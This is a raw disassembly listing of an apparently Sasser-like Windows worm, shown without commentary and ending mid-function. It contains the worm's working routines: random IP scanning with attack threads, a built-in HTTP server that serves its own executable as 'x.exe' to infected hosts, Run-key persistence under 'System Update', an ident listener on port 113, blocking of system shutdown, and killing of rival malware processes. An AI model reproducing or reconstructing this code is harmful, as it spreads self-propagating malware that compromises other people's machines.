var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3150117C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31501A14
call dword_31501180 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31501A14: ; CODE XREF: sub_315019F3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31501188 ; gethostbyname
test eax, eax
jnz short loc_31501A29
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31501A29: ; CODE XREF: sub_315019F3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_315019F3 endp
; =============== S U B R O U T I N E =======================================
sub_31501A32 proc near ; CODE XREF: sub_315020C4+22�p
; sub_31502128+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3150115C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31501A32 endp
; =============== S U B R O U T I N E =======================================
sub_31501A48 proc near ; CODE XREF: sub_31501D96+40�p
; sub_31501D96+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_315010DC ; OpenEventA
test eax, eax
jz short locret_31501A61
push eax
call dword_315010D8 ; SetEvent
locret_31501A61: ; CODE XREF: sub_31501A48+10�j
retn
sub_31501A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501A62 proc near ; DATA XREF: sub_31501BA8+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31501A93
push 1
jmp loc_31501B4E
; ---------------------------------------------------------------------------
loc_31501A93: ; CODE XREF: sub_31501A62+28�j
mov esi, dword_31501120
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B5E
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B5E
mov esi, dword_3150119C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push ds:dword_31506160
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31503A3E ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31501B10: ; CODE XREF: sub_31501A62+E8�j
mov eax, ds:dword_31506160
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31501B22
mov eax, ecx
loc_31501B22: ; CODE XREF: sub_31501A62+BC�j
test eax, eax
jz short loc_31501B51
push 0
push eax
mov eax, ds:dword_31506158
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31501B4C
cmp eax, 1000h
jb short loc_31501B51
push 64h
add edi, eax
call dword_315010A4 ; Sleep
jmp short loc_31501B10
; ---------------------------------------------------------------------------
loc_31501B4C: ; CODE XREF: sub_31501A62+D5�j
push 2
loc_31501B4E: ; CODE XREF: sub_31501A62+2C�j
pop eax
jmp short loc_31501BA1
; ---------------------------------------------------------------------------
loc_31501B51: ; CODE XREF: sub_31501A62+C2�j
; sub_31501A62+DC�j
push offset dword_3150615C
call dword_315010E4 ; InterlockedIncrement
jmp short loc_31501B7C
; ---------------------------------------------------------------------------
loc_31501B5E: ; CODE XREF: sub_31501A62+49�j
; sub_31501A62+61�j
mov esi, dword_3150119C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31505A84
push ebx
call esi ; send
loc_31501B7C: ; CODE XREF: sub_31501A62+FA�j
push 7D0h
call dword_315010A4 ; Sleep
push 2
push ebx
call dword_315011A4 ; shutdown
push ebx
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
loc_31501BA1: ; CODE XREF: sub_31501A62+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501A62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501BA8 proc near ; DATA XREF: sub_31501D96+14B�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_315018BA
lea eax, [ebp+var_130]
push 104h
push eax
push offset aSystemUpdate ; "System Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov ds:dword_3150615C, ebx
call sub_315023E4
add esp, 14h
test eax, eax
jnz loc_31501CDD
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_315010F0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31501C14
push 1
call dword_315010E0 ; ExitThread
loc_31501C14: ; CODE XREF: sub_31501BA8+62�j
push ebx
push esi
call dword_315010EC ; GetFileSize
push eax
mov ds:dword_31506160, eax
call sub_31502800
pop ecx
mov ds:dword_31506158, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push ds:dword_31506160
push eax
push esi
call dword_315010E8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov ds:dword_31506160, eax
call dword_315010BC ; CloseHandle
push ebx
push 1
push 2
call dword_3150118C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31503A38 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31501C76: ; CODE XREF: sub_31501BA8+E5�j
; sub_31501BA8+ED�j ...
call dword_31501124 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_3150618C, eax
jz short loc_31501C76
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31501C76
push eax
call dword_31501194 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31501170 ; bind
test eax, eax
jnz short loc_31501C76
push 64h
push edi
call dword_31501174 ; listen
mov [ebp+var_8], esi
pop esi
loc_31501CBF: ; CODE XREF: sub_31501BA8+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31501178 ; accept
push eax
push offset sub_31501A62
call sub_31501911
pop ecx
pop ecx
jmp short loc_31501CBF
; ---------------------------------------------------------------------------
loc_31501CDD: ; CODE XREF: sub_31501BA8+3D�j
push ebx
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31501BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501CEC proc near ; CODE XREF: sub_31501D96:loc_31501EB6�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3150116C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31501CEC endp
; ---------------------------------------------------------------------------
loc_31501D18: ; CODE XREF: UPX1:31508558�j
push 0
call dword_315010C4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_31506190, eax
call dword_31501094 ; DeleteFileA
call sub_315018BA
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov ds:dword_31506164, eax
call dword_31501098 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31501D5A
push 1
call dword_3150109C ; ExitProcess
loc_31501D5A: ; CODE XREF: UPX0:31501D50�j
call sub_31501727
call sub_31502548
call sub_315026C2
push offset sub_31501D96
call sub_315017AF
test eax, eax
pop ecx
jz short loc_31501D7F
push 0
call sub_31501D96
loc_31501D7F: ; CODE XREF: UPX0:31501D76�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31501D82 proc near ; CODE XREF: sub_31501D96:loc_31501F04�p
; sub_315020C4:loc_315020DD�p ...
push 0
push ds:dword_31506168
call dword_31501090 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31501D82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501D96 proc near ; CODE XREF: UPX0:31501D7A�p
; DATA XREF: UPX0:31501D69�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_315011B0
push offset loc_31503A80
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13_2ix ; "u13.2ix"
xor edi, edi
push edi
push 1
push edi
call dword_3150108C ; CreateEventA
mov ds:dword_31506168, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31501A48
mov [esp+8+var_8], offset aU11x ; "u11x"
call sub_31501A48
mov [esp+8+var_8], offset aU12x ; "u12x"
call sub_31501A48
mov [esp+8+var_8], offset aU13x ; "u13x"
call sub_31501A48
mov [esp+8+var_8], offset aU13ix ; "u13ix"
call sub_31501A48
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_315018E8
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_315018E8
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_315018E8
mov [esp+8+var_8], offset aU11 ; "u11"
call sub_315018E8
mov [esp+8+var_8], offset aU12 ; "u12"
call sub_315018E8
mov [esp+8+var_8], offset aU13 ; "u13"
call sub_315018E8
mov [esp+8+var_8], offset aU13i ; "u13i"
call sub_315018E8
mov [esp+8+var_8], offset aU13_2i ; "u13.2i"
call sub_315018E8
mov [esp+8+var_8], offset aU14 ; "u14"
call sub_315018E8
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31501EB6
push offset aWs2_32 ; "ws2_32"
mov esi, dword_315010B4
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov ds:dword_31506164, eax
loc_31501EB6: ; CODE XREF: sub_31501D96+E5�j
call sub_31501CEC
push edi
push offset sub_31501F6B
call sub_31501911
pop ecx
pop ecx
push 1F4h
mov esi, dword_315010A4
call esi ; Sleep
push edi
push offset loc_31503408
call sub_315018F7
push edi
push offset sub_31501BA8
call sub_315018F7
push edi
push offset sub_31502BE8
call sub_315018F7
push edi
push offset loc_315022D3
call sub_315018F7
add esp, 20h
loc_31501F04: ; CODE XREF: sub_31501D96+185�j
call sub_31501D82
test eax, eax
jnz short loc_31501F1D
push edi
call dword_31501038 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31501F04
; ---------------------------------------------------------------------------
loc_31501F1D: ; CODE XREF: sub_31501D96+175�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501D96 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31501F3A proc near ; CODE XREF: sub_31501F6B+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_31503A3E ; strlen
test eax, eax
pop ecx
jbe short loc_31501F68
loc_31501F4D: ; CODE XREF: sub_31501F3A+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31501F58
cmp al, 0Dh
jnz short loc_31501F5C
loc_31501F58: ; CODE XREF: sub_31501F3A+18�j
and byte ptr [esi+edi], 0
loc_31501F5C: ; CODE XREF: sub_31501F3A+1C�j
push edi
inc esi
call sub_31503A3E ; strlen
cmp esi, eax
pop ecx
jb short loc_31501F4D
loc_31501F68: ; CODE XREF: sub_31501F3A+11�j
pop edi
pop esi
retn
sub_31501F3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501F6B proc near ; DATA XREF: sub_31501D96+126�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_315018BA
call dword_31501124 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31501932
lea eax, [ebp+var_48]
mov ebx, offset dword_3150616C
push eax
push ebx
call sub_31503A8C ; strcpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_3150118C ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31501168 ; ntohl
push 71h
mov [ebp+var_14], eax
call dword_31501194 ; ntohs
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31501170 ; bind
test eax, eax
jz short loc_31501FF7
push 1
pop eax
loc_31501FF2: ; CODE XREF: sub_31501F6B+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31501FF7: ; CODE XREF: sub_31501F6B+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31501174 ; listen
test eax, eax
jz short loc_3150200F
push 1
pop eax
pop edi
pop esi
jmp short loc_31501FF2
; ---------------------------------------------------------------------------
loc_3150200F: ; CODE XREF: sub_31501F6B+9B�j
mov edi, dword_315010A4
loc_31502015: ; CODE XREF: sub_31501F6B+C6�j
; sub_31501F6B+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31501178 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31502033
push 64h
call edi ; Sleep
jmp short loc_31502015
; ---------------------------------------------------------------------------
loc_31502033: ; CODE XREF: sub_31501F6B+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_315011A0 ; recv
test eax, eax
jnz short loc_31502055
loc_3150204C: ; CODE XREF: sub_31501F6B+157�j
push esi
call dword_315011A8 ; closesocket
jmp short loc_31502015
; ---------------------------------------------------------------------------
loc_31502055: ; CODE XREF: sub_31501F6B+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31501F3A
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31503A86 ; strcat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31503A86 ; strcat
lea eax, [ebp+var_148]
push offset asc_31505B8C ; "\r\n"
push eax
call sub_31503A86 ; strcat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_31503A3E ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3150119C ; send
push 1388h
call edi ; Sleep
jmp short loc_3150204C
sub_31501F6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315020C4 proc near ; DATA XREF: sub_31502128+55�o
; sub_315021B0+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_315020D3
push 1
pop eax
jmp short locret_31502124
; ---------------------------------------------------------------------------
loc_315020D3: ; CODE XREF: sub_315020C4+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_315020DD: ; CODE XREF: sub_315020C4+5A�j
call sub_31501D82
test eax, eax
jnz short loc_31502120
call sub_31501A32
test eax, eax
jz short loc_31502120
cmp [ebp+var_1], bl
jz short loc_31502119
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_315011C0
movzx esi, ds:word_3150619C
pop ecx
call dword_31501124 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_315010A4 ; Sleep
loc_31502119: ; CODE XREF: sub_315020C4+2E�j
inc bl
cmp bl, 0FFh
jb short loc_315020DD
loc_31502120: ; CODE XREF: sub_315020C4+20�j
; sub_315020C4+29�j
pop esi
xor eax, eax
pop ebx
locret_31502124: ; CODE XREF: sub_315020C4+D�j
leave
retn 4
sub_315020C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502128 proc near ; DATA XREF: sub_315021B0+7E�o
; UPX0:31502365�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31502136
push 1
pop eax
jmp short loc_315021AC
; ---------------------------------------------------------------------------
loc_31502136: ; CODE XREF: sub_31502128+7�j
push ebx
push esi
push edi
call sub_315018BA
mov esi, dword_31501124
xor ebx, ebx
loc_31502146: ; CODE XREF: sub_31502128+7D�j
call sub_31501D82
test eax, eax
jnz short loc_315021A7
call sub_31501A32
test eax, eax
jz short loc_315021A7
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31506194
mov byte ptr [ebp+arg_0+3], al
call dword_315010E4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502189
push [ebp+arg_0]
push offset sub_315020C4
call sub_31501911
pop ecx
pop ecx
loc_31502189: ; CODE XREF: sub_31502128+50�j
movzx edi, ds:word_3150619C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_315010A4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31502146
loc_315021A7: ; CODE XREF: sub_31502128+25�j
; sub_31502128+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_315021AC: ; CODE XREF: sub_31502128+C�j
pop ebp
retn 4
sub_31502128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315021B0 proc near ; DATA XREF: UPX0:3150237D�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_315018BA
call sub_31501D82
test eax, eax
jnz loc_31502269
push ebx
mov ebx, dword_315010A4
push esi
mov esi, dword_31501124
push edi
loc_315021D6: ; CODE XREF: sub_315021B0+48�j
; sub_315021B0+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_315021E5: ; CODE XREF: sub_315021B0+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_315021E5
call sub_315019F3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_315021D6
call sub_31501A32
test eax, eax
jz short loc_31502241
push offset dword_31506194
call dword_315010E4 ; InterlockedIncrement
push edi
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502248
push edi
push offset sub_315020C4
call sub_31501911
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3150222D: ; CODE XREF: sub_315021B0+8D�j
push edi
push offset sub_31502128
call sub_31501911
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3150222D
jmp short loc_31502248
; ---------------------------------------------------------------------------
loc_31502241: ; CODE XREF: sub_315021B0+51�j
push 2710h
call ebx ; Sleep
loc_31502248: ; CODE XREF: sub_315021B0+67�j
; sub_315021B0+8F�j
movzx edi, ds:word_3150619C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31501D82
test eax, eax
jz loc_315021D6
pop edi
pop esi
pop ebx
loc_31502269: ; CODE XREF: sub_315021B0+11�j
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
leave
retn 4
sub_315021B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502277 proc near ; CODE XREF: UPX0:loc_3150233E�p
; UPX0:loc_315023A8�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_315019F3
push eax
call dword_31501190 ; inet_ntoa
mov esi, dword_31501088
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push ds:dword_3150618C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31505002
call esi ; lstrcpyA
push offset byte_31505000
call dword_315010A0 ; lstrlenA
mov byte_31505000[eax], 0DFh
pop esi
leave
retn
sub_31502277 endp
; ---------------------------------------------------------------------------
loc_315022D3: ; DATA XREF: sub_31501D96+161�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebp, ebp
push edi
mov ds:dword_31506194, ebp
call sub_31501A32
mov esi, dword_315010A4
mov edi, 1388h
test eax, eax
jnz short loc_31502301
loc_315022F5: ; CODE XREF: UPX0:315022FF�j
push edi
call esi ; Sleep
call sub_31501A32
test eax, eax
jz short loc_315022F5
loc_31502301: ; CODE XREF: UPX0:315022F3�j
lea eax, [esp+14h]
push ebp
push eax
call dword_3150115C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov ds:dword_31506198, ebp
pop ebx
mov ds:word_3150619C, 96h
jz short loc_3150233E
mov ds:dword_31506198, 1
mov ebx, 15Eh
mov ds:word_3150619C, 14h
loc_3150233E: ; CODE XREF: UPX0:31502324�j
call sub_31502277
mov ebp, [esp+14h]
cmp ebp, 100007Fh
jz short loc_3150235C
push ebp
push offset sub_315020C4
call sub_31501911
pop ecx
pop ecx
loc_3150235C: ; CODE XREF: UPX0:3150234D�j
mov dword ptr [esp+10h], 4
loc_31502364: ; CODE XREF: UPX0:31502375�j
push ebp
push offset sub_31502128
call sub_31501911
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31502364
test ebx, ebx
jle short loc_3150238C
loc_3150237B: ; CODE XREF: UPX0:3150238A�j
push 0
push offset sub_315021B0
call sub_31501911
pop ecx
dec ebx
pop ecx
jnz short loc_3150237B
loc_3150238C: ; CODE XREF: UPX0:31502379�j
; UPX0:31502398�j ...
call sub_31501A32
test eax, eax
jz short loc_3150239A
push edi
call esi ; Sleep
jmp short loc_3150238C
; ---------------------------------------------------------------------------
loc_3150239A: ; CODE XREF: UPX0:31502393�j
; UPX0:315023A6�j
call sub_31501A32
test eax, eax
jnz short loc_315023A8
push edi
call esi ; Sleep
jmp short loc_3150239A
; ---------------------------------------------------------------------------
loc_315023A8: ; CODE XREF: UPX0:315023A1�j
call sub_31502277
jmp short loc_3150238C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023AF proc near ; CODE XREF: sub_31502548+8C�p
; sub_315026C2+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jnz short loc_315023E2
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501030 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
loc_315023E2: ; CODE XREF: sub_315023AF+1C�j
pop ebp
retn
sub_315023AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023E4 proc near ; CODE XREF: sub_31501BA8+33�p
; sub_31502548+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jz short loc_31502410
push 1
pop eax
jmp short loc_3150243A
; ---------------------------------------------------------------------------
loc_31502410: ; CODE XREF: sub_315023E4+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31501028 ; RegQueryValueExA
test eax, eax
jz short loc_3150242F
push 2
pop esi
loc_3150242F: ; CODE XREF: sub_315023E4+46�j
push [ebp+arg_10]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_3150243A: ; CODE XREF: sub_315023E4+2A�j
pop esi
leave
retn
sub_315023E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150243D proc near ; CODE XREF: sub_315025F6+96�p
; sub_315026C2+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31501020 ; RegCreateKeyExA
test eax, eax
jz short loc_31502466
push 1
pop eax
jmp short loc_3150248D
; ---------------------------------------------------------------------------
loc_31502466: ; CODE XREF: sub_3150243D+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501024 ; RegSetValueExA
test eax, eax
jz short loc_31502482
push 2
pop esi
loc_31502482: ; CODE XREF: sub_3150243D+40�j
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_3150248D: ; CODE XREF: sub_3150243D+27�j
pop esi
pop ebp
retn
sub_3150243D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502490 proc near ; CODE XREF: sub_31502548+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_315010A0 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_31502544
loc_315024B0: ; CODE XREF: sub_31502490+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_315024B9
dec esi
jns short loc_315024B0
loc_315024B9: ; CODE XREF: sub_31502490+24�j
push 0
push 2
call sub_31503ABC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31502544
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31503A38 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31503AB6 ; Process32First
test eax, eax
jz short loc_31502544
lea esi, [esi+ebx+1]
loc_31502501: ; CODE XREF: sub_31502490+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502531
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_315010C0 ; OpenProcess
push 0
push eax
call dword_31501080 ; TerminateProcess
loc_31502531: ; CODE XREF: sub_31502490+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31503AB0 ; Process32Next
test eax, eax
jnz short loc_31502501
loc_31502544: ; CODE XREF: sub_31502490+1A�j
; sub_31502490+38�j ...
pop esi
pop ebx
leave
retn
sub_31502490 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502548 proc near ; CODE XREF: UPX0:31501D5F�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_315025B1: ; CODE XREF: sub_31502548+A7�j
mov eax, [ebp+var_4]
push 104h
